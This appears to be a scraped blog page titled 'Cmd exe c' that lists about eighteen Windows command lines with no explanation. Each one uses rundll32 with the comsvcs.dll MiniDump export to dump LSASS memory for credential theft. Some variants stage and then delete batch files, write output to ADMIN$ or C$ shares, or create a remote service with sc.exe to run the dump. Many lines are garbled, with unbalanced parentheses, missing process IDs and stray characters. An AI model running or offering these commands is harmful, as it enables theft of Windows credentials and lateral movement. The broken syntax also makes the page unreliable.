cjvilla.blogg.se

Cmd exe c

\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump C:\Users\Administrator\.dmp full ^> \\127.0.0.1\C$\_output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump get-process lsass).id) C:\Windows\lsass_$(Get-Date -Format dd-MM-hh-mm-ssdmp full"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoP -C C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump Get-Process lsass).Id \Windows\Temp\.dmp full Wait-Process -Id (Get-Process rundll32).id

Cmd /C "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump \\ipv4\pwn\.dmp full"

Cmd.exe /Q /c for /f "tokens=1,2 delims= " %A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump \Windows\Temp\.dmp full

Cmd.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump \Windows\Temp\.dmp full

Cmd.exe /C cmd.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump \Windows\Temp\.dmp full

Cmd.exe /C powershell.exe -NoP -C "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump Get-Process lsass).Id \Windows\Temp\.dmp full Wait-Process -Id (Get-Process rundll32).id"

Cmd.exe /Q /c powershell -noni -nop "rundll32.exe comsvcs.dll,minidump c:\windows\temp\test.log full" 1> \\127.0.0.1\ADMIN$\_1111111.1111111 2>&1

Cmd.exe /Q /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump C:\.dmp full 1> \\127.0.0.1\ADMIN$\_1111111.1111111 2>&1

"Powershell" -c "rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump get-process lsass).id C:\Users\username\AppData\Local\Temp\.dmp full"

C:\Windows\system32\cmd.exe /c "echo string >NUL & powershell -ExecutionPolicy bypass -Command "$a = (Get-Process lsass).id rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump a C:\Windows\TEMP\string\string\.dmp full" & exit"

C:\Windows\system32\cmd.exe /Q /c echo. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -c rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump C:\Users\username\Desktop\.DMP full

"C:\Windows\system32\sc.exe" \\server create Dump binpath= "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump C:\dump.bin full"

\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump C:\Users\Administrator\.dmp full


"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll MiniDump \Windows\Temp\.dmp full


By Jenna Magius and Nate Caroe - Calling MiniDump export by ordinal examples: (comsvcs,#24)













